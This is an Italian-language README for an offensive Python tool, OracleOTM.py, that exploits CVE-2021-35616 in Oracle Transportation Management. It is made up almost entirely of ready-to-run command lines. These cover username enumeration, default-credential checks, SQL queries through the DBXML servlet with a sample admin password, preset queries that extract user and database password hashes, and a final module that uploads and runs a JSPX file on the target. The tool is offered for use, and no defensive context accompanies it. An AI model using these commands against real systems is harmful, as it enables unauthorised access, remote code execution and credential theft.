
Strumento Python per lo sfruttamento di CVE-2021-35616
Strumento Python per sfruttare CVE-2021-35616
Lo script funziona a moduli, che ho implementato nel seguente ordine:
► Enumerazione degli username
► Ricerca di credenziali predefinite
► Esecuzione di una query SQL tramite il servlet DBXML
► Sfruttamento completo ed esecuzione di JSP
La sintassi dello script è la seguente:
.\OracleOTM.py {module} {host TXT file} {additional parameters}
Enumerazione degli username: .\OracleOTM.py enum {hosts TXT file} -u users.txt
Ricerca di credenziali predefinite: .\OracleOTM.py default {hosts TXT file}
Esecuzione di una query SQL tramite il servlet DBXML: .\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"
Ho anche preparato alcune query predefinite che ho trovato utili; puoi accedervi direttamente, come segue:
.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os
OS – Estrae il sistema operativo del server
Osuser – Estrae l'utente del sistema operativo che esegue il DB
Hostname – Nome host del server DB
Hostip – Indirizzo IP del server DB
Passwords – Estrae gli utenti OTM e le loro password hashate
Oraversion – Versione del database
Dbusershash – Hash delle password degli utenti del database
Dbfileslocation – Posizione dei file del database nel sistema operativo
Sfruttamento completo ed esecuzione di JSP: .\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"